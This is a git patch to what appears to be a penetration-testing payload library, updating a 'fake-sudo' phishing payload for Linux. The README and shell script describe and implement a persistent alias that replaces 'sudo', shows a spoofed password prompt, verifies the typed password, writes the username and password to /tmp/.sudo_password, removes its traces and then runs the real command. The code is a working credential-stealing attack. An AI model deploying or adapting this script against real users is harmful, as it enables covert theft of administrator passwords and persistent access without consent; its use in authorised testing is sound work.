From 80573a03ab10cce0b22f7c9bd0d059910d068439 Mon Sep 17 00:00:00 2001
From: TW-D <75358550+TW-D@users.noreply.github.com>
Date: Sun, 29 May 2022 17:21:12 -0400
Subject: [PATCH] fake-sudo - Improvements and corrections (#528)

* Update README.md

* Update sudo-phishing.sh

* Update sudo-phishing.sh

* Delete payloads/library/phishing/fake-sudo directory

* Add files via upload
---
 payloads/library/phishing/fake-sudo/README.md |  8 +++---
 .../library/phishing/fake-sudo/payload.txt    |  2 +-
 .../phishing/fake-sudo/sudo-phishing.sh       | 27 +++++++++++--------
 3 files changed, 20 insertions(+), 17 deletions(-)

diff --git a/payloads/library/phishing/fake-sudo/README.md b/payloads/library/phishing/fake-sudo/README.md
index dfe8c791..d528e8ff 100644
--- a/payloads/library/phishing/fake-sudo/README.md
+++ b/payloads/library/phishing/fake-sudo/README.md
@@ -2,7 +2,7 @@
 
 - Title:         Fake sudo
 - Author:        TW-D
-- Version:       1.0
+- Version:       1.1
 - Target:        Linux
 - Category:      Phishing
 
@@ -12,7 +12,7 @@
 2) Defines a new persistent "sudo" alias with the file "~/.bash_aliases".
 3) When the user "sudoer" executes the command "sudo" in a terminal, the spoofing program :
 - __By default__ retrieves the username and password and writes them to "/tmp/.sudo_password".
-- __But__ this behavior can be changed in line 21 of the "sudo-phishing.sh" file.
+- __But__ this behavior can be changed in line 26 of the "sudo-phishing.sh" file.
 4) The spoofing program deletes the "sudo" alias. Then it deletes itself.
 
 ## Configuration
@@ -29,7 +29,6 @@ readonly BB_LABEL="BashBunny"
 From "sudo-phishing.sh" change the values of the following constants if necessary :
 ```bash
 
-readonly INPUT_MESSAGE="[sudo] password for ${USER}: "
 readonly MAXIMUM_ATTEMPTS=3
 readonly ERROR_MESSAGE="sudo: ${MAXIMUM_ATTEMPTS} incorrect password attempts"
 
@@ -40,9 +39,8 @@ From "sudo-phishing.sh", change the payload if you wish :
 ##
 # <YOUR-PAYLOAD>
 ##
-/usr/bin/echo "${USER}:${sudo_password}" > /tmp/.sudo_password
+/bin/echo "${USER}:${sudo_password}" > /tmp/.sudo_password
 ##
 # </YOUR-PAYLOAD>
 ##
 ```
-
diff --git a/payloads/library/phishing/fake-sudo/payload.txt b/payloads/library/phishing/fake-sudo/payload.txt
index a9bb2d1d..8c7b8522 100644
--- a/payloads/library/phishing/fake-sudo/payload.txt
+++ b/payloads/library/phishing/fake-sudo/payload.txt
@@ -7,7 +7,7 @@
 #                   command by defining an persistent alias.
 #
 # Author:           TW-D
-# Version:          1.0
+# Version:          1.1
 # Category:         Phishing
 # Target:           Linux
 # Attackmodes:      HID and STORAGE
diff --git a/payloads/library/phishing/fake-sudo/sudo-phishing.sh b/payloads/library/phishing/fake-sudo/sudo-phishing.sh
index bd489f74..5a23359a 100644
--- a/payloads/library/phishing/fake-sudo/sudo-phishing.sh
+++ b/payloads/library/phishing/fake-sudo/sudo-phishing.sh
@@ -6,36 +6,41 @@
 # of the "sudo" command.
 #
 
-readonly INPUT_MESSAGE="[sudo] password for ${USER}: "
+if [ -z "${SUDO_PROMPT}" ]; then
+    readonly INPUT_MESSAGE="[sudo] password for ${USER}: "
+else
+    readonly INPUT_MESSAGE="${SUDO_PROMPT}"
+fi
+
 readonly MAXIMUM_ATTEMPTS=3
 readonly ERROR_MESSAGE="sudo: ${MAXIMUM_ATTEMPTS} incorrect password attempts"
 
 attempts() {
-    /usr/bin/echo -n "${INPUT_MESSAGE}"
+    /bin/echo -n "${INPUT_MESSAGE}"
     read -r -s sudo_password
-    /usr/bin/echo ""
-    if /usr/bin/echo "${sudo_password}" | /usr/bin/sudo -S /usr/bin/true 2> /dev/null; then
+    /bin/echo ""
+    if ( /bin/echo "${sudo_password}" | /usr/bin/sudo -S /bin/true > /dev/null 2>&1 ); then
         ##
         # <YOUR-PAYLOAD>
         ##
-        /usr/bin/echo "${USER}:${sudo_password}" > /tmp/.sudo_password
+        /bin/echo "${USER}:${sudo_password}" > /tmp/.sudo_password
         ##
         # </YOUR-PAYLOAD>
         ##
-        /usr/bin/rm ~/.sudo_phishing.sh
+        /bin/rm ~/.sudo_phishing.sh
         /usr/bin/head -n -1 ~/.bash_aliases > ~/.bash_aliases_bak
-        /usr/bin/mv ~/.bash_aliases_bak ~/.bash_aliases
-        /usr/bin/echo "${sudo_password}" | /usr/bin/sudo -S "${@}"
+        /bin/mv ~/.bash_aliases_bak ~/.bash_aliases
+        /bin/echo "${sudo_password}" | /usr/bin/sudo -S "${@}"
         $BASH
         exit 0
     fi
 }
 
-if (/usr/bin/sudo -n /usr/bin/true 2> /dev/null) || [ "${#}" -eq 0 ]; then
+if ( (/usr/bin/sudo -n /bin/true > /dev/null 2>&1) || [ "${#}" -eq 0 ] ); then
     /usr/bin/sudo "${@}"
 else
     for ((iterator=1; iterator <= MAXIMUM_ATTEMPTS; iterator++)); do
         attempts "${@}"
     done
-    /usr/bin/echo "${ERROR_MESSAGE}"
-fi
+    /bin/echo "${ERROR_MESSAGE}"
+fi
\ No newline at end of file